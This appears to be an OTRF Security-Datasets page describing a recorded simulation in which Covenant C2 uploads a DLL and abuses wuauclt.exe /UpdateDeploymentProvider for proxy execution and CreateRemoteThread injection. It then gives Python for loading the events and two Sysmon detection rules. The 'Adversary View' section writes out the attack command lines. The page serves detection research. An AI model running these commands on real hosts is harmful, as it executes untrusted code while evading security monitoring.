Covenant Wuauclt CreateRemoteThread Execution

Metadata

Contributors: Roberto Rodriguez @Cyb3rWard0g
Creation Date: 2020/10/12
Modification Date: 2020/10/12
Tactics: TA0005
Techniques: T1218
Tags: CreateRemoteThread

Dataset Description

This dataset captures an adversary proxy-executing code through the Windows Update client utility (wuauclt.exe). To evade rules that look for that binary making direct outbound connections to the Internet, the simulation instead has wuauclt.exe load an attacker-supplied DLL and create and run a thread in the virtual address space of another process via the CreateRemoteThread API.

Simulation Metadata

Tools

Type: C2
Name: Covenant
Module: ShellCmd

Adversary View

Upload /filepath:"C:\ProgramData\SimpleInjection.dll"

ShellCmd /shellcommand:"C:\Windows\System32\wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\SimpleInjection.dll /RunHandlerComServe"

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

# Dataset archive hosted in the OTRF Security-Datasets repository
url = "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/covenant_lolbin_wuauclt_createremotethread.zip"
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()  # fail early if the download did not succeed
zipFile = ZipFile(BytesIO(zipFileRequest.content))
# The archive holds a single JSON-lines file; extract it to the working directory
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

import pandas as pd

# Each line of the extracted file is one event record (JSON lines format)
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

# Count events per log channel, most populous channel first
df.groupby(['Channel']).size().sort_values(ascending=False)
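Once the events are loaded, the two behaviours described in the dataset description can be checked directly. The following is an added detection example, not code from the Security-Datasets project: it runs two rules over a handful of constructed Sysmon-style records (field names EventID, Image, CommandLine, SourceImage and TargetImage are assumed to follow Sysmon's naming; the target process name and the benign wuauclt invocations are made-up sample values). Rule one flags a process-creation event (Sysmon Event ID 1) where wuauclt.exe is given an /UpdateDeploymentProvider DLL that lives outside the Windows directory; rule two flags a CreateRemoteThread event (Sysmon Event ID 8) whose source image is wuauclt.exe and whose target is a different process. The same functions work unchanged on the real dataset by iterating over the extracted JSON-lines file instead of the embedded sample.

```python
import json
import re

# Constructed sample events in JSON-lines shape. Field names are assumed to
# match Sysmon's; the values are made up except for the wuauclt command line,
# which is the one shown in the Adversary View above.
SAMPLE_EVENTS = [
    # Benign: routine update check, no deployment-provider DLL
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Image": "C:\\Windows\\System32\\wuauclt.exe",
     "CommandLine": "C:\\Windows\\System32\\wuauclt.exe /detectnow"},
    # Suspicious: deployment-provider DLL loaded from ProgramData
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Image": "C:\\Windows\\System32\\wuauclt.exe",
     "CommandLine": "C:\\Windows\\System32\\wuauclt.exe /UpdateDeploymentProvider "
                    "C:\\ProgramData\\SimpleInjection.dll /RunHandlerComServe"},
    # Constructed control case: DLL path under the Windows directory is allowed
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Image": "C:\\Windows\\System32\\wuauclt.exe",
     "CommandLine": "C:\\Windows\\System32\\wuauclt.exe /UpdateDeploymentProvider "
                    "C:\\Windows\\System32\\wuaueng.dll"},
    # Benign: a remote thread not originating from wuauclt.exe
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 8,
     "SourceImage": "C:\\Windows\\System32\\svchost.exe",
     "TargetImage": "C:\\Windows\\System32\\svchost.exe"},
    # Suspicious: wuauclt.exe creating a thread in another process
    # (target process name is a constructed placeholder)
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 8,
     "SourceImage": "C:\\Windows\\System32\\wuauclt.exe",
     "TargetImage": "C:\\Windows\\System32\\notepad.exe"},
]
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

WINDOWS_DIR = "c:\\windows\\"  # DLLs under here are treated as trusted by rule one
PROVIDER_RE = re.compile(r"/updatedeploymentprovider\s+(\S+)", re.IGNORECASE)


def is_wuauclt(image_path):
    """True when the image path names the Windows Update client binary."""
    return image_path.lower().endswith("\\wuauclt.exe")


def suspicious_deployment_provider(event):
    """Rule one (Event ID 1): wuauclt.exe started with an /UpdateDeploymentProvider DLL
    outside the Windows directory. Returns the DLL path on a hit, else None."""
    if event.get("EventID") != 1 or not is_wuauclt(event.get("Image", "")):
        return None
    match = PROVIDER_RE.search(event.get("CommandLine", ""))
    if not match:
        return None
    dll_path = match.group(1).strip('"')
    if dll_path.lower().startswith(WINDOWS_DIR):
        return None
    return dll_path


def remote_thread_from_wuauclt(event):
    """Rule two (Event ID 8): wuauclt.exe creating a thread in a different process.
    Returns the target image on a hit, else None."""
    if event.get("EventID") != 8 or not is_wuauclt(event.get("SourceImage", "")):
        return None
    source = event.get("SourceImage", "")
    target = event.get("TargetImage", "")
    if source.lower() == target.lower():
        return None
    return target


def analyze(jsonl_text):
    """Run both rules over JSON-lines text and return (rule_name, detail) hits in order."""
    hits = []
    for line in jsonl_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        dll_path = suspicious_deployment_provider(event)
        if dll_path:
            hits.append(("wuauclt_untrusted_provider_dll", dll_path))
        target = remote_thread_from_wuauclt(event)
        if target:
            hits.append(("wuauclt_createremotethread", target))
    return hits


if __name__ == "__main__":
    for rule, detail in analyze(SAMPLE_JSONL):
        print(f"{rule}: {detail}")
```

Against the real dataset, read the extracted file with `open(datasetJSONPath).read()` and pass it to `analyze`; the DLL allow-list in rule one is deliberately coarse (anything under C:\Windows), so tune it to the paths your environment's update infrastructure legitimately uses before relying on it.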